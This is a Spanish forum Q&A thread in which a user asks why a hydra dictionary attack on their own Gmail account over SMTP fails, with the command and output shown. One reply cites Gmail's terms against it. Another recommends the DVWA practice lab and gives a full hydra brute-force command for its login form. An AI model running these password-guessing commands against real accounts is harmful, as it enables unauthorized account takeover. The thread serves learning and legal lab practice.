Intentando atacar con el diccionario a mi propia cuenta de Gmail con hydra en smtp

Navega tus respuestas
2

Estoy tratando de entrar en mi propia cuenta de Gmail. Pero no está funcionando. ¿Alguien tiene alguna idea? ¿Hay algo que pueda hacer para aislar más el problema? Estoy ejecutando Kali 2016.1 en la caja virtual. Estoy conectado directamente a mi módem con el modo NAT activado en VB. Aquí está lo que probé a continuación.

EDITAR: También cambié la marca -t a 1. Es posible que no le haya gustado tener 4 solicitudes a la vez. Más o menos los mismos resultados. 

hydra -l ********@gmail.com -P passwords.txt -s 465 -S -v -V -t 4 smtp.gmail.com smtp

Ahora aquí están los resultados. 

Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-10 16:21:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Google Mail has bruteforce detection and sends false positives. You are not doing anything illegal right?!
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
[DATA] attacking service smtp on port 465 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "aaaa" - 1 of 4 [child 0]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "*******************" - 2 of 4 [child 1]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "jkjh" - 3 of 4 [child 2]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "" - 4 of 4 [child 3]
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[STATUS] attack finished for smtp.gmail.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-10 16:21:33
    
pregunta user21303 11.08.2016 - 06:07
fuente

2 respuestas

4

Lo que estás haciendo es una violación de los Términos de servicio de Gmail . Texto aplicable:

  

No haga mal uso de nuestros servicios. Por ejemplo, no interfiera con nuestros Servicios o intente acceder a ellos utilizando un método que no sea la interfaz y las instrucciones que proporcionamos. puede usar nuestros Servicios solo según lo permita la ley, incluida la exportación aplicable. y reexportar las leyes y regulaciones de control. Podemos suspender o dejar de proporcionarle nuestros Servicios si no cumple con nuestros términos o políticas o si estamos investigando una posible conducta indebida.

No estás pirateando "tu propia cuenta". En este caso, está intentando omitir el sistema de autenticación de GMail, un servicio que seguramente no le pertenece. Esto es, en el mejor de los casos, una infracción de ToS y, en el peor, es ilegal.

    
respondido por el Bradley Evans 11.08.2016 - 06:41
fuente
3

Descargue la aplicación web Damn Vulnerable en este sitio.

Es impresionante y gratis, puedes intentar hackearlo sin consecuencias. Buena suerte

Lea también this y < a href="http://blog.pusheax.com/2014/01/dictionary-and-brute-force-attack-using.html"> this

Yo uso este tipo de comando 

hydra 192.168.88.4 -l admin -P C:\Hydra\List\Passwords_million_password_list_top_1000000.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=Paste ID here"

Esta es una línea de ejemplo del hackeo del sitio DVWA.

    
respondido por el Jonas 25.08.2016 - 16:37
fuente

Lea otras preguntas en las etiquetas

¿Por qué Google no publica imágenes de firmware de Android con muchos controladores, que funcionarán en muchos dispositivos? La mejor manera de cifrar datos usando php: no estoy seguro de si lo estoy haciendo correctamente [duplicar]